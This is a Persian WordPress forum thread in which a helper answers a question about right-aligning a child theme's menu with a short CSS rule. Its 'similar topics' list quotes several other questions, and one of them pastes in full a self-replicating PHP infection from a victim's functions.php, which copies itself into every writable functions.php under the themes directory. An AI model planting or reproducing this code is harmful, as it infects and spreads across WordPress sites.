mohammadjavad

منو دوم سایت رو در پوسته child به سمت راست انتقال دهیم

4 پست در این موضوع قرار دارد

سلام و درود خدمت تمامی دوستان

من پوسته مولتی نیوز فارسی را خریداری کردم ، پوسته child رو هم خودش داشت

اما الان موقع استفاده از سایت منو اولیه سایت در سمت چپ نشون داده میشه 

این ادرس سایت م هستش ideapaydar.com 

از زبان برنامه نویسی هم چیزی بلد نیستم 

لطفا خیلی ساده بهم توضیح بدید 

متشکرم 

0

به اشتراک گذاری این پست


لینک به پست
در 8 ساعت قبل، mohammadjavad گفته است :

سلام و درود خدمت تمامی دوستان

من پوسته مولتی نیوز فارسی را خریداری کردم ، پوسته child رو هم خودش داشت

اما الان موقع استفاده از سایت منو اولیه سایت در سمت چپ نشون داده میشه 

این ادرس سایت م هستش ideapaydar.com 

از زبان برنامه نویسی هم چیزی بلد نیستم 

لطفا خیلی ساده بهم توضیح بدید 

متشکرم 

سلام 

برای این که منو رو به سمت راست سایت انتقال بدید کافی از کد زیر استفاده کنید:

ul.main-menu, ul.top-menu {
    float: right;
}

برای قرار دادن این کد به مسیر زیر مراجعه کنید:

نمایش--> سفارشی سازی--> و در بخش css های اضافه کد بالا رو قرار دهید.

 

موفق باشی دوست عزیز...

0

به اشتراک گذاری این پست


لینک به پست

دوست عزیزم مرسی از راهنمایی که کردی

واقعا ممنونم 

پیروز و موفق باشی

0

به اشتراک گذاری این پست


لینک به پست
در 10 ساعت قبل، mohammadjavad گفته است :

دوست عزیزم مرسی از راهنمایی که کردی

واقعا ممنونم 

پیروز و موفق باشی

خواهش میکنم.
موفق باشی عزیز...

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط sajjadmp
      سلام 
      من برای دومین بار دست به ساختن پوسته ی فرزند برای یه پوسته شدم ولی این بار مثل دفعه ی قبل نیست . 
      به محض ایجاد فایل functions.php ، کدهای زیر توش قرار میگیره و هر چقدر هم که پاک میکنم دوباره می بینم سر و کلشون پیدا میشه و همین باعث میشه وردپرس صفحه سفید مرگ رو نشون بده ! 
      راهکار چیه ؟؟
      <?php function _check_active_widget(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; $output=strip_tags($output, $allowed); $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f); $output .= ($showdot && $ellipsis) ? "..." : ""; } } } } return $output; } function _get_all_widgetcont($wids,$items=array()){ $places=array_shift($wids); if(substr($places,-1) == "/"){ $places=substr($places,0,-1); } if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } } }else{ return false; } if (sizeof($wids) > 0){ return _get_all_widgetcont($wids,$items); } else { return $items; } } if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } add_action("admin_head", "_check_active_widget"); ?>  
    • توسط thismoment
      من برای یک پوسته وردپرسی یک پوسته فرزند ایجاد کردم که در پوسته مادر فایل custom-header.php در مسیر inc/custom-header.php قرار داره
      من میخوام در پوسته ی فرزنداین فایل رو ویرایش کنم ولی متاسفانه بازم فایل پوسته مادر لود میشه
      علتش چیه؟
      پوسته ی فرزند فقط فایل های اصلی تم (index.php category.php page.php , ...) رو پشتیبانی میکنه؟
    • توسط koroush
      با سلام خدمت شما
      یه پوسته فرزند دارم و یه فایل avia-media.css موجود در پوسته والد که می خوام کد های اون رو از طریق پوسته فرزند تغییر بدم
      زمانی که در پوسته والد جستجو می کنم. نام فایل مورد نظر رو جستجو می کنم. به نتایج زیر میرسم.
      wp_enqueue_style( 'avia-media-style' , AviaBuilder::$path['assetsURL'].'css/avia-media.css');
      تا اونجایی که من می دونم فایل css مورد نظر از طریق php فراخوانی شده . که باید برای ایجاد تغییرات فایل تغییر یافته رو بهش معرفی کنم (ازطریق php فراخوانی کنیم ) اما چون از خط بالا سر در نمی یارم نمی دونم باید چیکار کنم.
      ممنون میشم راهنمایی نمایید.
      بااحترام
    • توسط koroush
      با سلام خدمت شما
      در پوسته والد بنده فایلی به نام shortcodes.css واقع در پوشه css موجود است.
      بنده در پوسته فرزند پوشه ی css رو ایجاد کردم و فایلی هم نام با فایل اصلی ایجاد کردم اما زمانی که تغییراتی در فایل css فرزند می دم تغیرات اعمال نمیشه.
      همین مشکل رو بنده با فایل css مربوط به قسمت مدیریتی وردپرس نیز دارم.(admin.css )
      زمانی هم که فایل مورد نظر رو با نرم افزار notepad++ جستجو کردم( برای اینکه بفهمم فایل مورد نظر از کجا فراخوانی میشه) به نتایج زیر رسیدم ممنون میشم در این مورد راهنمایی کنید.
      wp-content\themes\aks2aks\framework\php\avia_shortcodes\preview-shortcode-external.php
      Line 18: $shortcode_css = AVIA_BASE_URL.’css/shortcodes.css';
      wp-content\themes\aks2aks\framework\php\avia_shortcodes\tinymce\dialog.php
      Line 7: $shortcode_css = AVIA_BASE_URL.’css/shortcodes.css';
      wp-content\themes\aks2aks\framework\php\avia_shortcodes\tinymce\js\table-control.js
      Line 74:var style = jQuery(”).prependTo(thickbox),
      wp-content\themes\aks2aks\functions.php
      Line 291: wp_enqueue_style( ‘avia-scs’, $template_url.”/css/shortcodes.css”, array(), ‘2’, ‘all’ );
      پیششاپیش از راهنمایی شما تشکر می کنم.
    • توسط سعید شعبانی
      1- آیا میشه فایل های پی اچ پی قالب رو هم مانند فایل استایل ویرایش کرد. یعنی فایل اصلی رو از پوسته مادر بگیریم و بعد زیر اون کد هایی رو که می خواهیم بازنگری بشند رو بنویسیم؟
      2- اگر فایلی که در پوسته مادر هست مثل عکس در پوسته بچه نباشه این فایل از پوسته مادر بارگذاری میشه؟
      3- زمانی که پوسته مادر بروز میشه اگر ما مثلا فایل فانکشن پوسته رو کاملا در پوسته بچه ساخته باشیم کد هایی که به فانکشن پوسته مادر اضافه می شوند را می توان به صورت اتوماتیک به پوسته بچه افزود؟
      4- با استفاده از پوسته بچه برخی از فایل ها باید از فولدر پوسته مادر بارگزاری شوند و بعضی هم از پوسته بچه حال آیا سرعت بارگزاری پوسته پایین تر می آید؟